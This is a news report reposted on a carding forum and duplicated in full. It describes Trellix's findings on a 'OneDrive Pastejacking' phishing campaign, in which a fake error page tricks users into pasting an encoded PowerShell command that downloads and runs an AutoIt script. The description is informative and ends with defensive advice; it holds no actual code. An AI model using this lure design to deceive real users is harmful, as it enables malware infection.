Carding Forum
Professional
- Messages
- 2,788
- Reaction score
- 1,173
- Points
- 113
Trellix specialists reveal the mechanisms of a new phishing campaign.
Cybersecurity researchers from the company Trellix warn about a new phishing campaign aimed at Microsoft OneDrive users. The attackers goal is to execute a malicious PowerShell script.
Raphael Pena, a security researcher at Trellix, said that the campaign actively uses social engineering tactics to trick users into executing a PowerShell script, which leads to the compromise of their systems.
Trellix tracks this phishing campaign called OneDrive Pastejacking. The attack begins with an email containing an HTML file that, when opened, displays an image that mimics the OneDrive page, with the error message: "Failed to connect to the OneDrive cloud service. To fix the error, you must manually update the DNS cache."
The message offers two options: "How to fix it" and "Details". Clicking on the "Details" button takes the user to the legitimate Microsoft Learn DNS troubleshooting page. However, clicking on "How to Fix" initiates a series of steps, including opening a PowerShell terminal and inserting a Base64-encoded command, ostensibly to fix the error.
The command runs "ipconfig /flushdns", creates a folder called "downloads" on the C drive, downloads the archive file there, unpacks its contents, and executes the script using "AutoIt3.exe".
This campaign targets users in the United States, South Korea, Germany, India, Ireland, Italy, Norway, and the United Kingdom. Similar attacks are also being tracked by ReliaQuest, Proofpoint, and McAfee Labs, indicating the growing popularity of this phishing technique known as ClickFix.
This case highlights the importance of critical thinking, because cybercriminals are constantly improving their methods, using people's trust in well-known brands and their desire to quickly solve certain technical problems.
The key to security is not only the use of antivirus programs, but also the development of skills to recognize suspicious actions, especially when it comes to executing unknown commands on your device. Executing complex technical commands for no good reason in most cases leads to malware infection on your computer.
Source
Cybersecurity researchers from the company Trellix warn about a new phishing campaign aimed at Microsoft OneDrive users. The attackers goal is to execute a malicious PowerShell script.
Raphael Pena, a security researcher at Trellix, said that the campaign actively uses social engineering tactics to trick users into executing a PowerShell script, which leads to the compromise of their systems.
Trellix tracks this phishing campaign called OneDrive Pastejacking. The attack begins with an email containing an HTML file that, when opened, displays an image that mimics the OneDrive page, with the error message: "Failed to connect to the OneDrive cloud service. To fix the error, you must manually update the DNS cache."
The message offers two options: "How to fix it" and "Details". Clicking on the "Details" button takes the user to the legitimate Microsoft Learn DNS troubleshooting page. However, clicking on "How to Fix" initiates a series of steps, including opening a PowerShell terminal and inserting a Base64-encoded command, ostensibly to fix the error.
The command runs "ipconfig /flushdns", creates a folder called "downloads" on the C drive, downloads the archive file there, unpacks its contents, and executes the script using "AutoIt3.exe".
This campaign targets users in the United States, South Korea, Germany, India, Ireland, Italy, Norway, and the United Kingdom. Similar attacks are also being tracked by ReliaQuest, Proofpoint, and McAfee Labs, indicating the growing popularity of this phishing technique known as ClickFix.
This case highlights the importance of critical thinking, because cybercriminals are constantly improving their methods, using people's trust in well-known brands and their desire to quickly solve certain technical problems.
The key to security is not only the use of antivirus programs, but also the development of skills to recognize suspicious actions, especially when it comes to executing unknown commands on your device. Executing complex technical commands for no good reason in most cases leads to malware infection on your computer.
Source
